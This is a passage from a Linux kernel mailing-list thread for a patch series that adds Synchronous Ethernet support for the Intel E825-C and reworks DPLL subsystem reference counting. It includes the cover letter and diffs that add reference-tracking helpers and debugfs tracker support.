This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Refactor the reference counting mechanism for DPLL devices and pins to improve consistency and prevent potential lifetime issues. Introduce internal helpers __dpll_{device,pin}_{hold,put}() to centralize reference management. Update the internal XArray reference helpers (dpll_xa_ref_*) to automatically grab a reference to the target object when it is added to a list, and release it when removed. This ensures that objects linked internally (e.g., pins referenced by parent pins) are properly kept alive without relying on the caller to manually manage the count. Consequently, remove the now redundant manual `refcount_inc/dec` calls in dpll_pin_on_pin_{,un}register()`, as ownership is now correctly handled by the dpll_xa_ref_* functions. Additionally, ensure that dpll_device_{,un}register()` takes/releases a reference to the device, ensuring the device object remains valid for the duration of its registration. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/dpll_core.c | 74 +++++++++++++++++++++++++++------------- 1 file changed, 50 insertions(+), 24 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 59081cf2c73ae..f6ab4f0cad84d 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -83,6 +83,45 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } +static void __dpll_device_hold(struct dpll_device *dpll) +{ + refcount_inc(&dpll->refcount); +} + +static void __dpll_device_put(struct dpll_device *dpll) +{ + if (refcount_dec_and_test(&dpll->refcount)) { + ASSERT_DPLL_NOT_REGISTERED(dpll); + WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); + xa_destroy(&dpll->pin_refs); + xa_erase(&dpll_device_xa, dpll->id); + WARN_ON(!list_empty(&dpll->registration_list)); + kfree(dpll); + } +} + +static void __dpll_pin_hold(struct dpll_pin *pin) +{ + refcount_inc(&pin->refcount); +} + +static void dpll_pin_idx_free(u32 pin_idx); +static void dpll_pin_prop_free(struct dpll_pin_properties *prop); + +static void __dpll_pin_put(struct dpll_pin *pin) +{ + if (refcount_dec_and_test(&pin->refcount)) { + xa_erase(&dpll_pin_xa, pin->id); + xa_destroy(&pin->dpll_refs); + xa_destroy(&pin->parent_refs); + xa_destroy(&pin->ref_sync_pins); + dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); + kfree_rcu(pin, rcu); + } +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -152,6 +191,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_pin_hold(pin); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -174,6 +214,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); + __dpll_pin_put(pin); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -231,6 +272,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_device_hold(dpll); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -253,6 +295,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -323,8 +366,8 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { + __dpll_device_hold(dpll); ret = dpll; - refcount_inc(&ret->refcount); break; } } @@ -347,14 +390,7 @@ EXPORT_SYMBOL_GPL(dpll_device_get); void dpll_device_put(struct dpll_device *dpll) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&dpll->refcount)) { - ASSERT_DPLL_NOT_REGISTERED(dpll); - WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); - xa_destroy(&dpll->pin_refs); - xa_erase(&dpll_device_xa, dpll->id); - WARN_ON(!list_empty(&dpll->registration_list)); - kfree(dpll); - } + __dpll_device_put(dpll); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -416,6 +452,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; + __dpll_device_hold(dpll); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -455,6 +492,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -666,8 +704,8 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { + __dpll_pin_hold(pos); ret = pos; - refcount_inc(&ret->refcount); break; } } @@ -690,16 +728,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); void dpll_pin_put(struct dpll_pin *pin) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&pin->refcount)) { - xa_erase(&dpll_pin_xa, pin->id); - xa_destroy(&pin->dpll_refs); - xa_destroy(&pin->parent_refs); - xa_destroy(&pin->ref_sync_pins); - dpll_pin_prop_free(&pin->prop); - fwnode_handle_put(pin->fwnode); - dpll_pin_idx_free(pin->pin_idx); - kfree_rcu(pin, rcu); - } + __dpll_pin_put(pin); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -740,8 +769,8 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { + __dpll_pin_hold(pin); ret = pin; - refcount_inc(&ret->refcount); break; } } @@ -893,7 +922,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, ret = dpll_xa_ref_pin_add(&pin->parent_refs, parent, ops, priv, pin); if (ret) goto unlock; - refcount_inc(&pin->refcount); xa_for_each(&parent->dpll_refs, i, ref) { ret = __dpll_pin_register(ref->dpll, pin, ops, priv, parent); if (ret) { @@ -913,7 +941,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, parent); dpll_pin_delete_ntf(pin); } - refcount_dec(&pin->refcount); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); unlock: mutex_unlock(&dpll_lock); @@ -940,7 +967,6 @@ void dpll_pin_on_pin_unregister(struct dpll_pin *parent, struct dpll_pin *pin, mutex_lock(&dpll_lock); dpll_pin_delete_ntf(pin); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); - refcount_dec(&pin->refcount); xa_for_each(&pin->dpll_refs, i, ref) __dpll_pin_unregister(ref->dpll, pin, ops, priv, parent); mutex_unlock(&dpll_lock); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:35 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Add support for the REF_TRACKER infrastructure to the DPLL subsystem. When enabled, this allows developers to track and debug reference counting leaks or imbalances for dpll_device and dpll_pin objects. It records stack traces for every get/put operation and exposes this information via debugfs at: /sys/kernel/debug/ref_tracker/dpll_device_* /sys/kernel/debug/ref_tracker/dpll_pin_* The following API changes are made to support this: 1. dpll_device_get() / dpll_device_put() now accept a 'dpll_tracker *' (which is a typedef to 'struct ref_tracker *' when enabled, or an empty struct otherwise). 2. dpll_pin_get() / dpll_pin_put() and fwnode_dpll_pin_find() similarly accept the tracker argument. 3. Internal registration structures now hold a tracker to associate the reference held by the registration with the specific owner. All existing in-tree drivers (ice, mlx5, ptp_ocp, zl3073x) are updated to pass NULL for the new tracker argument, maintaining current behavior while enabling future debugging capabilities. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Petr Oros <poros@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * added missing tracker parameter to fwnode_dpll_pin_find() stub v3: * added Kconfig dependency on STACKTRACE_SUPPORT and DEBUG_KERNEL --- drivers/dpll/Kconfig | 15 +++ drivers/dpll/dpll_core.c | 98 ++++++++++++++----- drivers/dpll/dpll_core.h | 5 + drivers/dpll/zl3073x/dpll.c | 12 +-- drivers/net/ethernet/intel/ice/ice_dpll.c | 14 +-- .../net/ethernet/mellanox/mlx5/core/dpll.c | 13 +-- drivers/ptp/ptp_ocp.c | 15 +-- include/linux/dpll.h | 21 ++-- 8 files changed, 139 insertions(+), 54 deletions(-) diff --git a/drivers/dpll/Kconfig b/drivers/dpll/Kconfig index ade872c915ac6..be98969f040ab 100644 --- a/drivers/dpll/Kconfig +++ b/drivers/dpll/Kconfig @@ -8,6 +8,21 @@ menu "DPLL device support" config DPLL bool +config DPLL_REFCNT_TRACKER + bool "DPLL reference count tracking" + depends on DEBUG_KERNEL && STACKTRACE_SUPPORT && DPLL + select REF_TRACKER + help + Enable reference count tracking for DPLL devices and pins. + This helps debugging reference leaks and use-after-free bugs + by recording stack traces for each get/put operation. + + The tracking information is exposed via debugfs at: + /sys/kernel/debug/ref_tracker/dpll_device_* + /sys/kernel/debug/ref_tracker/dpll_pin_* + + If unsure, say N. + source "drivers/dpll/zl3073x/Kconfig" endmenu diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f6ab4f0cad84d..627a5b39a0efd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -41,6 +41,7 @@ struct dpll_device_registration { struct list_head list; const struct dpll_device_ops *ops; void *priv; + dpll_tracker tracker; }; struct dpll_pin_registration { @@ -48,6 +49,7 @@ struct dpll_pin_registration { const struct dpll_pin_ops *ops; void *priv; void *cookie; + dpll_tracker tracker; }; static int call_dpll_notifiers(unsigned long action, void *info) @@ -83,33 +85,68 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } -static void __dpll_device_hold(struct dpll_device *dpll) +static void dpll_device_tracker_alloc(struct dpll_device *dpll, + dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&dpll->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_device_tracker_free(struct dpll_device *dpll, + dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&dpll->refcnt_tracker, tracker); +#endif +} + +static void __dpll_device_hold(struct dpll_device *dpll, dpll_tracker *tracker) +{ + dpll_device_tracker_alloc(dpll, tracker); refcount_inc(&dpll->refcount); } -static void __dpll_device_put(struct dpll_device *dpll) +static void __dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { + dpll_device_tracker_free(dpll, tracker); if (refcount_dec_and_test(&dpll->refcount)) { ASSERT_DPLL_NOT_REGISTERED(dpll); WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); xa_destroy(&dpll->pin_refs); xa_erase(&dpll_device_xa, dpll->id); WARN_ON(!list_empty(&dpll->registration_list)); + ref_tracker_dir_exit(&dpll->refcnt_tracker); kfree(dpll); } } -static void __dpll_pin_hold(struct dpll_pin *pin) +static void dpll_pin_tracker_alloc(struct dpll_pin *pin, dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&pin->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_pin_tracker_free(struct dpll_pin *pin, dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&pin->refcnt_tracker, tracker); +#endif +} + +static void __dpll_pin_hold(struct dpll_pin *pin, dpll_tracker *tracker) +{ + dpll_pin_tracker_alloc(pin, tracker); refcount_inc(&pin->refcount); } static void dpll_pin_idx_free(u32 pin_idx); static void dpll_pin_prop_free(struct dpll_pin_properties *prop); -static void __dpll_pin_put(struct dpll_pin *pin) +static void __dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { + dpll_pin_tracker_free(pin, tracker); if (refcount_dec_and_test(&pin->refcount)) { xa_erase(&dpll_pin_xa, pin->id); xa_destroy(&pin->dpll_refs); @@ -118,6 +155,7 @@ static void __dpll_pin_put(struct dpll_pin *pin) dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); dpll_pin_idx_free(pin->pin_idx); + ref_tracker_dir_exit(&pin->refcnt_tracker); kfree_rcu(pin, rcu); } } @@ -191,7 +229,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -214,7 +252,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); - __dpll_pin_put(pin); + __dpll_pin_put(pin, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -272,7 +310,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -295,7 +333,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -337,6 +375,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) return ERR_PTR(ret); } xa_init_flags(&dpll->pin_refs, XA_FLAGS_ALLOC); + ref_tracker_dir_init(&dpll->refcnt_tracker, 128, "dpll_device"); return dpll; } @@ -346,6 +385,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * @clock_id: clock_id of creator * @device_idx: idx given by device driver * @module: reference to registering module + * @tracker: tracking object for the acquired reference * * Get existing object of a dpll device, unique for given arguments. * Create new if doesn't exist yet. @@ -356,7 +396,8 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * * ERR_PTR(X) - error */ struct dpll_device * -dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) +dpll_device_get(u64 clock_id, u32 device_idx, struct module *module, + dpll_tracker *tracker) { struct dpll_device *dpll, *ret = NULL; unsigned long index; @@ -366,13 +407,17 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, tracker); ret = dpll; break; } } - if (!ret) + if (!ret) { ret = dpll_device_alloc(clock_id, device_idx, module); + if (!IS_ERR(ret)) + dpll_device_tracker_alloc(ret, tracker); + } + mutex_unlock(&dpll_lock); return ret; @@ -382,15 +427,16 @@ EXPORT_SYMBOL_GPL(dpll_device_get); /** * dpll_device_put - decrease the refcount and free memory if possible * @dpll: dpll_device struct pointer + * @tracker: tracking object for the acquired reference * * Context: Acquires a lock (dpll_lock) * Drop reference for a dpll device, if all references are gone, delete * dpll device object. */ -void dpll_device_put(struct dpll_device *dpll) +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_device_put(dpll); + __dpll_device_put(dpll, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -452,7 +498,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -492,7 +538,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -622,6 +668,7 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, &dpll_pin_xa_id, GFP_KERNEL); if (ret < 0) goto err_xa_alloc; + ref_tracker_dir_init(&pin->refcnt_tracker, 128, "dpll_pin"); return pin; err_xa_alloc: xa_destroy(&pin->dpll_refs); @@ -683,6 +730,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); * @pin_idx: idx given by dev driver * @module: reference to registering module * @prop: dpll pin properties + * @tracker: tracking object for the acquired reference * * Get existing object of a pin (unique for given arguments) or create new * if doesn't exist yet. @@ -694,7 +742,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); */ struct dpll_pin * dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, - const struct dpll_pin_properties *prop) + const struct dpll_pin_properties *prop, dpll_tracker *tracker) { struct dpll_pin *pos, *ret = NULL; unsigned long i; @@ -704,13 +752,16 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { - __dpll_pin_hold(pos); + __dpll_pin_hold(pos, tracker); ret = pos; break; } } - if (!ret) + if (!ret) { ret = dpll_pin_alloc(clock_id, pin_idx, module, prop); + if (!IS_ERR(ret)) + dpll_pin_tracker_alloc(ret, tracker); + } mutex_unlock(&dpll_lock); return ret; @@ -720,15 +771,16 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); /** * dpll_pin_put - decrease the refcount and free memory if possible * @pin: pointer to a pin to be put + * @tracker: tracking object for the acquired reference * * Drop reference for a pin, if all references are gone, delete pin object. * * Context: Acquires a lock (dpll_lock) */ -void dpll_pin_put(struct dpll_pin *pin) +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_pin_put(pin); + __dpll_pin_put(pin, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -752,6 +804,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); /** * fwnode_dpll_pin_find - find dpll pin by firmware node reference * @fwnode: reference to firmware node + * @tracker: tracking object for the acquired reference * * Get existing object of a pin that is associated with given firmware node * reference. @@ -761,7 +814,8 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); * * valid dpll_pin pointer on success * * NULL when no such pin exists */ -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker) { struct dpll_pin *pin, *ret = NULL; unsigned long index; @@ -769,7 +823,7 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, tracker); ret = pin; break; } diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index b7b4bb251f739..71ac88ef20172 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -10,6 +10,7 @@ #include <linux/dpll.h> #include <linux/list.h> #include <linux/refcount.h> +#include <linux/ref_tracker.h> #include "dpll_nl.h" #define DPLL_REGISTERED XA_MARK_1 @@ -23,6 +24,7 @@ * @type: type of a dpll * @pin_refs: stores pins registered within a dpll * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @registration_list: list of registered ops and priv data of dpll owners **/ struct dpll_device { @@ -33,6 +35,7 @@ struct dpll_device { enum dpll_type type; struct xarray pin_refs; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct list_head registration_list; }; @@ -48,6 +51,7 @@ struct dpll_device { * @ref_sync_pins: hold references to pins for Reference SYNC feature * @prop: pin properties copied from the registerer * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @rcu: rcu_head for kfree_rcu() **/ struct dpll_pin { @@ -61,6 +65,7 @@ struct dpll_pin { struct xarray ref_sync_pins; struct dpll_pin_properties prop; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct rcu_head rcu; }; diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 9eed21088adac..8788bcab7ec53 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1480,7 +1480,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props); + &props->dpll_props, NULL); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1503,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1534,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); pin->dpll_pin = NULL; } @@ -1708,7 +1708,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE); + THIS_MODULE, NULL); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1720,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } @@ -1743,7 +1743,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 53b54e395a2ed..64b7b045ecd58 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c 